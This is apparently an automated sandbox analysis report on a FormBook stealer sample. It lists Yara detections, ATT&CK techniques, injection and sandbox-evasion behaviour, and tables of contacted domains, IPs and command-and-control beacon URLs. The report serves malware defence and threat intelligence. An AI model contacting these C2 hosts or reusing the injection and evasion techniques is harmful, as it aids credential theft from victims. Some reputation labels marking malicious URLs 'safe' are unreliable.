          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 612 | Masquerading 1 | Input Capture 1 | Security Software Discovery 221 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 404135, Sample: g1EhgmCqCD.exe, Startdate: 04/05/2021, Architecture: WINDOWS, Score: 100

Start
• DNS/IP: www.2000deal.com, www.mollysmulligan.com, 2000deal.com
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
• Process: g1EhgmCqCD.exe (started)
  • Created file: C:\Users\user\AppData\...\g1EhgmCqCD.exe.log, ASCII (dropped)
  • Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  • Process: g1EhgmCqCD.exe (started)
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • Process: explorer.exe (injected)
      • DNS/IP: www.anygivenrunday.com 172.247.179.61, 49768, 80 CNSERVERSUS United States; timbraunmusician.com 107.180.51.23, 49767, 80 AS-26496-GO-DADDY-COM-LLCUS United States; 15 other IPs or domains
      • Signature: System process connects to network (likely due to code injection or exploit)
      • Process: msiexec.exe (started)
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • Process: cmd.exe (started)
          • Process: conhost.exe (started)

          Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
g1EhgmCqCD.exe | 19% | Virustotal |
g1EhgmCqCD.exe | 26% | ReversingLabs |
g1EhgmCqCD.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.g1EhgmCqCD.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.carterandcone.com$d | 0% | Avira URL Cloud | safe
http://www.effectivemarketinginc.com/8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnH | 0% | Avira URL Cloud | safe
http://www.fontbureau.comiona | 0% | URL Reputation | safe
http://www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.kayandbernard.com/8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.sandoll.co.krcom | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnr | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.churchsw.org/church-projector-project | 0% | Avira URL Cloud | safe
http://www.goodfont.co.krn | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.2000deal.com/8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.carterandcone.comI | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/8 | 0% | Avira URL Cloud | safe
http://www.carterandcone.comTC | 0% | URL Reputation | safe
http://www.carterandcone.comnic | 0% | Avira URL Cloud | safe
http://www.churchsw.org/repository/Bibles/ | 0% | Avira URL Cloud | safe
http://www.carterandcone.comu | 0% | Avira URL Cloud | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://en.wikip | 0% | URL Reputation | safe
www.cats16.com/8u3b/ | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.gb-contracting.com/8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://mollysmulligan.com/8u3b/?DzrXY=Q16 | 0% | Avira URL Cloud | safe
http://www.anygivenrunday.com/8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn6 | 0% | Avira URL Cloud | safe
http://www.carterandcone.comfr | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.sandoll.co.krn-u | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr- | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnKr4 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Reputation
kayandbernard.com | 184.168.131.241 | true | true | unknown
palomachurch.com | 184.168.131.241 | true | true | unknown
timbraunmusician.com | 107.180.51.23 | true | true | unknown
parkingpage.namecheap.com | 198.54.117.216 | true | false | high
2000deal.com | 34.102.136.180 | true | false | unknown
gb-contracting.com | 34.102.136.180 | true | false | unknown
effectivemarketinginc.com | 34.102.136.180 | true | false | unknown
www.anygivenrunday.com | 172.247.179.61 | true | true | unknown
www.mollysmulligan.com | 3.13.31.214 | true | false | unknown
www.2000deal.com | unknown | unknown | true | unknown
www.kayandbernard.com | unknown | unknown | true | unknown
www.cats16.com | unknown | unknown | true | unknown
www.gb-contracting.com | unknown | unknown | true | unknown
www.fnatic-skins.club | unknown | unknown | true | unknown
www.benleefoto.com | unknown | unknown | true | unknown
www.effectivemarketinginc.com | unknown | unknown | true | unknown
www.donelys.com | unknown | unknown | true | unknown
www.timbraunmusician.com | unknown | unknown | true | unknown
www.palomachurch.com | unknown | unknown | true | unknown
www.web-evo.com | unknown | unknown | true | unknown

                                                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P | true | Avira URL Cloud: safe | unknown
http://www.timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P | true | Avira URL Cloud: safe | unknown
http://www.effectivemarketinginc.com/8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P | false | Avira URL Cloud: safe | unknown
http://www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P | true | Avira URL Cloud: safe | unknown
http://www.kayandbernard.com/8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P | true | Avira URL Cloud: safe | unknown
http://www.2000deal.com/8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P | false | Avira URL Cloud: safe | unknown
www.cats16.com/8u3b/ | true | Avira URL Cloud: safe | low
http://www.gb-contracting.com/8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P | false | Avira URL Cloud: safe | unknown
http://www.anygivenrunday.com/8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P | true | Avira URL Cloud: safe | unknown

                                                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html3 | g1EhgmCqCD.exe, 00000001.00000003.653172373.0000000005B7E000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
